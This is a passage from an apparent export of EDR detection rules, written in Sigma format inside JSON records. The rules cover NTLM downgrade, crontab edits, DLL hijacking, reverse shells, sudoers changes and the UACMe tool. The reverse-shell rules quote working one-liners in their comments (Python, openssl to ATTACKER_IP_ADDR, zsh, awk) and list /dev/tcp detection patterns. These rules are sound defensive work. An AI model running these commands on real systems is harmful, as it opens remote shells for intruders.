gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_sccm:\n ProcessAncestors|contains: '|?:\\MININT\\Tools\\X64\\TsManager.exe|?:\\MININT\\Tools\\X64\\TsmBootstrap.exe|'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2b16b989-2088-48a9-a2e4-ff125b31a00e", "rule_name": "NetLM Downgraded", "rule_description": "Detects the downgrade of the NetLM configuration in the Windows registry.\nThe modification of LmCompatibilityLevel registry value to 2 or less disables the use of NTLMv2 session security.\nThis weaken the security of network authentications and can be used by attackers to extract the NTLM hash.\nIt is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\n", "rule_creation_date": "2020-11-09", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence" ], "rule_technique_tags": [ "attack.t1112", "attack.t1562.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2b26abb8-6656-496d-8bdf-d47537666c04", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.093694Z", "creation_date": "2026-03-23T11:45:34.093696Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.093700Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md", "https://attack.mitre.org/techniques/T1053/003/" ], "name": "t1053_003_crontab_edit_macos.yml", "content": "title: Cron Jobs Edited via Crontab (macOS)\nid: 2b26abb8-6656-496d-8bdf-d47537666c04\ndescription: |\n Detects the execution of the crontab command to edit cron jobs.\n An attacker could use crontab to add a malicious cron job for persistence.\n It is recommended to check the content of the file in command-line for any unwanted lines.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/14\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/crontab'\n CommandLine|contains: ' -e'\n condition: selection\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2b26abb8-6656-496d-8bdf-d47537666c04", "rule_name": "Cron Jobs Edited via Crontab (macOS)", "rule_description": "Detects the execution of the crontab command to edit cron jobs.\nAn attacker could use crontab to add a malicious cron job for persistence.\nIt is recommended to check the content of the file in command-line for any unwanted lines.\n", "rule_creation_date": "2022-11-14", "rule_modified_date": "2025-01-30", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1053.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.592619Z", "creation_date": "2026-03-23T11:45:34.592625Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.592638Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/xforcered/WFH", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_rdpinput.yml", "content": "title: DLL Hijacking via rdpinput.exe\nid: 2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1\ndescription: |\n Detects potential Windows DLL Hijacking via rdpinput.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpinput.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\winsta.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1", "rule_name": "DLL Hijacking via rdpinput.exe", "rule_description": "Detects potential Windows DLL Hijacking via rdpinput.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2b5b655e-f7bb-4864-9202-ad7b2087ae12", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.095413Z", "creation_date": "2026-03-23T11:45:34.095415Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.095419Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux", "https://attack.mitre.org/techniques/T1059/006/" ], "name": "t1059_006_reverse_shell_python_macos.yml", "content": "title: Reverse Shell Executed via Python (macOS)\nid: 2b5b655e-f7bb-4864-9202-ad7b2087ae12\ndescription: |\n Detects a suspicious command line related to a reverse shell execution via Python.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewalls restrictions.\n It is recommended to check for malicious behavior by the process launching the command and its potential children.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2022/11/14\nmodified: 2025/01/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # export RHOST=\"127.0.0.1\";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n # python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n selection_command:\n CommandLine|contains|all:\n - 'import'\n - 'socket'\n - '.socket('\n - '.connect('\n - 'os.dup2('\n - 'fileno()'\n\n selection_shell:\n CommandLine|contains:\n - '.spawn('\n - '.call('\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2b5b655e-f7bb-4864-9202-ad7b2087ae12", "rule_name": "Reverse Shell Executed via Python (macOS)", "rule_description": "Detects a suspicious command line related to a reverse shell execution via Python.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewalls restrictions.\nIt is recommended to check for malicious behavior by the process launching the command and its potential children.\n", "rule_creation_date": "2022-11-14", "rule_modified_date": "2025-01-10", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1059.006" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2bade688-d13f-4317-9d07-3994ff35201f", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.623552Z", "creation_date": "2026-03-23T11:45:34.623554Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.623559Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://hacktricks.wiki/en/generic-hacking/reverse-shells/linux.html", "https://www.revshells.com/", "https://attack.mitre.org/techniques/T1059/004/", "https://attack.mitre.org/techniques/T1559/" ], "name": "t1059_004_reverse_shell_command_line_linux.yml", "content": "title: Reverse Shell Execution from Command-line\nid: 2bade688-d13f-4317-9d07-3994ff35201f\ndescription: |\n Detects different suspicious usages of the shell that are related to reverse shells.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewall restrictions.\n It is recommended to investigate the process tree for suspicious activities.\nreferences:\n - https://hacktricks.wiki/en/generic-hacking/reverse-shells/linux.html\n - https://www.revshells.com/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2022/07/01\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.t1559\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.RemoteShell\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_command:\n CommandLine|contains:\n - 'http://reverse-shell.sh/'\n - 'https://reverse-shell.sh/'\n - 'sh -i*>*/dev/tcp/*'\n - 'sh -i*>*/dev/udp/*'\n - 'exec *<>*/dev/tcp/*'\n - 'exec *<>*/dev/udp/*'\n - 'sh*0>*/dev/tcp/'\n - 'sh*0>*/dev/udp/'\n - 'sh -i <&3 >&3 2>&3'\n # openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :\n - 's_client*-connect*:*|*sh*|*s_client*-connect*:*'\n # mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER_IP_ADDR:443 > /tmp/s; rm /tmp/s\n - '2>&1*openssl*s_client'\n # zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.10 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'\n - 'zmodload zsh/net/tcp * ztcp'\n\n # awk 'BEGIN {s = \"/inet/tcp/0//\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n selection_awk_protocol:\n CommandLine|contains:\n - '/inet/tcp/'\n - '/inet/udp/'\n selection_awk_command:\n CommandLine|contains|all:\n - 'BEGIN '\n - 'printf'\n - 'getline '\n - 'close('\n\n exclusion_localhost:\n CommandLine|contains:\n - '/dev/tcp/127.0.0.1/'\n - '/dev/tcp/localhost/'\n - '/dev/udp/127.0.0.1/'\n - '/dev/udp/localhost/'\n\n exclusion_commandline:\n CommandLine|contains:\n - '/dev/tcp/$HOST/$PORT'\n - '/dev/tcp/${host}/${port}'\n\n exclusion_containerd:\n - ParentImage:\n - '/bin/runc'\n - '/bin/containerd-shim-runc-v2'\n - '/usr/bin/containerd-shim-runc-v2'\n - Ancestors|contains:\n - '|/bin/runc|'\n - '|/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n condition: (selection_command or all of selection_awk_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2bade688-d13f-4317-9d07-3994ff35201f", "rule_name": "Reverse Shell Execution from Command-line", "rule_description": "Detects different suspicious usages of the shell that are related to reverse shells.\nA reverse shell is shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewall restrictions.\nIt is recommended to investigate the process tree for suspicious activities.\n", "rule_creation_date": "2022-07-01", "rule_modified_date": "2026-03-17", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1059.004", "attack.t1559" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2bb34ffc-2356-4191-b774-bc4fc82ee828", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-24T07:14:08.712525Z", "creation_date": "2026-03-23T11:45:34.612480Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.612488Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1", "https://attack.mitre.org/techniques/T1548/003/" ], "name": "t1548_003_sudo_config_modified_linux.yml", "content": "title: Sudo Configuration Modified (Linux)\nid: 2bb34ffc-2356-4191-b774-bc4fc82ee828\ndescription: |\n Detects a suspicious attempt to modify the content of '/etc/sudoers' or any file within '/etc/sudoers.d'.\n These files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\n Their modification can be an attempt to elevate privileges.\n It is recommended to investigate the process responsible for this action for suspicious activities.\nreferences:\n - https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1\n - https://attack.mitre.org/techniques/T1548/003/\ndate: 2022/10/27\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/sudoers'\n - '/etc/sudoers.d/*'\n - TargetPath:\n - '/etc/sudoers'\n - '/etc/sudoers.d/*'\n\n filter_access_old:\n Kind: 'access'\n Permissions: 'read'\n\n filter_access_new:\n Kind:\n - 'read'\n - 'remove'\n - 'chmod'\n - 'chown'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dpkg_cmds:\n - ProcessCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n - '/usr/bin/python* /usr/bin/reconfigure'\n - ProcessParentCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - ProcessGrandparentImage: '/usr/bin/rpm'\n\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n\n exclusion_puppet:\n - ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessCommandLine|startswith: '/usr/bin/ruby /usr/bin/puppet'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/snap/docker/*/bin/dockerd'\n - ProcessGrandparentImage: '/usr/bin/dockerd'\n - ProcessAncestors|contains: '|/usr/bin/dockerd|'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_common:\n - ProcessImage:\n - '/usr/bin/rm'\n - '/bin/chmod'\n - '/usr/bin/chmod'\n - '/bin/chown'\n - '/usr/bin/chown'\n - '/kaniko/executor'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/packagekitd'\n - '/usr/bin/podman'\n - '/usr/bin/touch'\n - '/usr/bin/dpkg-statoverride'\n - '/usr/sbin/cfagent'\n - '/usr/sbin/adsysd'\n - '/bin/busybox'\n - '/usr/bin/rsync'\n - '/usr/bin/dos2unix'\n - '/snap/snapd/*/usr/lib/snapd/snap-confine'\n - ProcessGrandparentImage:\n - '/kaniko/executor'\n - '/usr/bin/runc'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/bin/podman'\n\n # template_exclusion_ansible\n\n exclusion_salt:\n - ProcessCommandLine: '/usr/bin/python* /usr/bin/salt-minion'\n - ProcessImage: '/opt/saltstack/salt/bin/python?.??'\n\n exclusion_cloud-init:\n ProcessCommandLine|startswith: '/usr/bin/python? /usr/bin/cloud-init'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_sophos:\n ProcessParentImage: '/opt/sophos-av/engine/_/savd.?'\n\n exclusion_aws:\n ProcessParentImage: '/usr/bin/ssm-agent-worker'\n\n exclusion_rename:\n Kind: 'rename'\n ProcessImage:\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n TargetPath:\n - '/etc/sudoers~'\n - '/etc/sudoers.d/*~'\n\n exclusion_temp_file:\n - ProcessImage: '/usr/bin/sed'\n Path: '/etc/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath: '/etc/sed??????'\n\n exclusion_cyberwatch:\n ProcessGrandparentCommandLine|contains:\n - '|| echo \"# cyberwatch privileges\" | sudo tee -a /etc/sudoers'\n - '|| echo \"Defaults:cyberwatch !requiretty\" | sudo tee -a /etc/sudoers'\n - '|| echo \"cyberwatch ALL=(ALL) NOPASSWD:ALL\" | sudo tee -a /etc/sudoers'\n\n exclusion_buildah:\n ProcessGrandparentImage: '/usr/bin/buildah'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2bb34ffc-2356-4191-b774-bc4fc82ee828", "rule_name": "Sudo Configuration Modified (Linux)", "rule_description": "Detects a suspicious attempt to modify the content of '/etc/sudoers' or any file within '/etc/sudoers.d'.\nThese files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\nTheir modification can be an attempt to elevate privileges.\nIt is recommended to investigate the process responsible for this action for suspicious activities.\n", "rule_creation_date": "2022-10-27", "rule_modified_date": "2026-03-20", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2bbd2cab-7189-4801-aff8-def8972e59db", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.606241Z", "creation_date": "2026-03-23T11:45:34.606245Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.606252Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/hfiref0x/UACME", "https://attack.mitre.org/techniques/T1548/002/" ], "name": "t1548_002_akagi.yml", "content": "title: UACMe HackTool Executed\nid: 2bbd2cab-7189-4801-aff8-def8972e59db\ndescription: |\n Detects the execution of UACMe (Akagi) User Account Control bypass toolkit.\n UACMe is a well-known privilege escalation tool that contains multiple techniques to bypass Windows UAC protection mechanisms.\n It is frequently used by attackers after initial access to elevate privileges without triggering UAC prompts.\n It is recommended to investigate the process ancestry and any subsequent high-privilege process creations.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/10/27\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.UACMe\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'Akagi.exe'\n InternalName: 'Akagi'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2bbd2cab-7189-4801-aff8-def8972e59db", "rule_name": "UACMe HackTool Executed", "rule_description": "Detects the execution of UACMe (Akagi) User Account Control bypass toolkit.\nUACMe is a well-known privilege escalation tool that contains multiple techniques to bypass Windows UAC protection mechanisms.\nIt is frequently used by attackers after initial access to elevate privileges without triggering UAC prompts.\nIt is recommended to investigate the process ancestry and any subsequent high-privilege process creations.\n", "rule_creation_date": "2021-10-27", "rule_modified_date": "2025-03-31", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2bc7247d-de5a-436c-a772-bb81fb27eda8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.609754Z", "creation_date": "2026-03-23T11:45:34.609757Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.609765Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://medium.com/@boutnaru/the-windows-process-journey-runlegacycplelevated-exe-93f040f78c54", "https://attack.mitre.org/techniques/T1548/002/" ], "name": "t1548_002_runlegacycplelevated.yml", "content": "title: RunLegacyCPLElevated Executed\nid: 2bc7247d-de5a-436c-a772-bb81fb27eda8\ndescription: |\n Detects the execution of RunLegacyCPLElevated.exe, a legitimate Windows binary used for running a legacy control panel applet in elevated mode.\n Adversaries may use RunLegacyCPLElevated to execute CPL file with high privileges.\n It is recommended to check child processes of RunLegacyCPLElevated for 